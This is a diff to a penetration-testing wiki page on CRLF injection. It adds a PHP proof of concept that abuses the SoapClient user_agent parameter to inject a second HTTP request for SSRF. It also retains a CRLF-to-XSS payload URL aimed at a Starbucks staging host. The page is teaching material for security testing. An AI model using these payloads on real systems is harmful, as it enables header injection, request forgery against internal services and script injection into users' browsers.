GitBook: [master] 447 pages modified

pentesting-web/crlf-0d-0a.md

@@ -102,7 +102,37 @@ http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/ht
 http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
 ```
 
-[https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md)
+{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}
+
+### New HTTP request in SSRF
+
+Abusing CRLF injection you can **craft a new HTTP request and inject it**.  
+A good example can be done using the `SoapClient` deserialization gadget from in PHP. This class is **vulnerable to CRLF** inside the `user_agent` parameter allowing to i**nsert new headers and body content**. However, you can even be able to abuse this vulnerability to **inject a new HTTP request:**
+
+```php
+$target = 'http://127.0.0.1:9090/test'; 
+$post_string = 'variable=post value';
+$crlf = array(
+    'POST /proxy HTTP/1.1',
+    'Host: local.host.htb',
+    'Cookie: PHPSESSID=[PHPSESSID]',
+    'Content-Type: application/x-www-form-urlencoded',
+    'Content-Length: '.(string)strlen($post_string),
+    "\r\n",
+    $post_string
+);
+
+$client = new SoapClient(null,
+    array(
+        'uri'=>$target,
+        'location'=>$target,
+        'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
+    )
+);
+
+#Put a nc listening in port 9090
+$client->__soapCall("test", []);
+```
 
 ### HTTP Header Injection